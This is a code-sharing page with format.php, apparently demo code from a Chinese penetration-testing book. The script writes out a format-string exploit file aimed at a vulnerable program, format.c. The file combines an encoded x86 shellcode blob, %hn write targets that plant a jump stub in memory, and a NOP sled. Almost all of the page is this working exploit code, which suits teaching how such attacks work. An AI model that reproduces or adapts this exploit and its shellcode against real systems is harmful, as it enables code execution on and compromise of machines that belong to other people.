📄 format.php

📁 网络渗透技术配书源码

💻 PHP

字号:

<?php
/* format.php
*
*  《网络渗透技术》演示程序
*  作者：san, alert7, eyas, watercloud
**  构造格式化串文件binfile，针对format.c
*/

$flag = 2;
$shellcode =
"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x58\x01\x80\x34\x0b\xf8\xe2\xfa".
"\xeb\x05\xe8\xeb\xff\xff\xff\x11\xda\xf9\xf8\xf8\xa7\x9c\x59\xc8".
"\xf8\xf8\xf8\xa8\x73\xb8\xf4\x73\xb8\xe4\x73\x90\xf0\xa8\x73\x0f".
"\x92\xfa\xa1\x10\x39\xf8\xf8\xf8\x1a\x01\xa0\x73\xf8\x73\x90\xf0".
"\xa0\x07\xce\x77\xb8\xd8\x07\x8e\xfc\x77\xb8\xdc\x92\xfb\xa1\x10".
"\x5d\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f\x8b\xca\xa7".
"\xac\x07\xae\xf0\x73\x10\x92\xfd\xa1\x10\x73\xf8\xf8\xf8\x1a\x01".
"\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae\xec\xa8".
"\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe0\x73\x20\xcb\x38\xa8\xa8".
"\xa8\x73\x04\x9e\x3f\xff\xfa\xf8\x9e\x73\xbe\xd0\x7e\x3c\x9e\x71".
"\xbf\xfa\x92\xe8\xaf\xab\x07\xae\xe4\x92\xf9\xab\x07\xae\xd8\xa8".
"\xa8\xab\x07\xae\xdc\x73\x20\x90\x9b\x95\x9c\xf8\x75\xec\xdc\x7b".
"\x14\xac\x73\x04\x92\xec\xa1\xcb\x38\x71\xfc\x77\x1a\x03\x3e\xbf".
"\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71\xa7\xb0\x71\xa7\xb4\x71\xa7".
"\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9\x92\xf9\xa9\xa9\xaa\xa9\x07".
"\xae\xf4\xcb\x38\xb0\xa8\x07\xae\xe8\xa9\xae\x73\x8d\xc4\x73\x8c".
"\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb\x0d\xcb\x31\xb1\xb9\x55\xfb".
"\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c\xf0\x39\x33\xff\xfb\x22\xb8".
"\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6\xdc\xfb\x25\x9e\x73\xf4\xb3".
"\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb\x3d\x53\xa6\xa1\x3b\x10\x21".
"\x06\x07\x07\x06\xdc\x81\x9c\x22\x06\xf1\x6e\xca\x8c\x69\xf4\x31".
"\x44\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c".
"\xe8\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf9\xa4\xe9\x47\x1d";

/*
7FFDF250    54              PUSH ESP
7FFDF251    5F              POP EDI
7FFDF252    B8 90909090     MOV EAX,90909090
7FFDF257    FC              CLD
7FFDF258    F2:AF           REPNE SCAS DWORD PTR ES:[EDI]
7FFDF25A    57              PUSH EDI
7FFDF25B    C3              RETN
*/
$fmt_array = array(
                    0x7FFDF250 => "0x5f54",
                    0x7FFDF252 => "0x90b8",
                    0x7FFDF254 => "0x9090",
                    0x7FFDF256 => "0xfc90",
                    0x7FFDF258 => "0xaff2",
                    0x7FFDF25A => "0xc357",
                    0x7FFDF022 => "0x7ffd",
                    0x7FFDF020 => "0xf250",
                   );

asort($fmt_array);
print_r($fmt_array);
$count = count($fmt_array);

$head = "";
$tail = "";
$last = 0;
foreach($fmt_array as $k => $v) {
    printf("%x\n", $k);
    $b0 = sprintf("%c", (($k >> 24) & 0xff));
    $b1 = sprintf("%c", (($k >> 16) & 0xff));
    $b2 = sprintf("%c", (($k >>  8) & 0xff));
    $b3 = sprintf("%c", (($k      ) & 0xff));

    if (!$last) {
        $last += 8*$count+8*$flag;
    }

    $head .= "AAAA".$b3.$b2.$b1.$b0;
    $tail .= "%".($v-$last)."c%hn";
    $last  = $v;
}
$fmt_str  = $head.(str_repeat("%.8x", $flag)).$tail;

$fmt_str .= str_repeat("\x90", 100).$shellcode;

$fp = fopen("binfile", "wb");
fwrite($fp, $fmt_str);
fclose($fp);
?>

💿 文件大小 4896 K

👤 上传用户 wuseyue

📂 所属分类 SQL Server

🏷️ 相关标签

#网络 #源码

⌨️ 快捷键说明

复制代码 Ctrl + C

搜索代码 Ctrl + F

全屏模式 F11

切换主题 Ctrl + Shift + D

显示快捷键 ?

增大字号 Ctrl + =

减小字号 Ctrl + -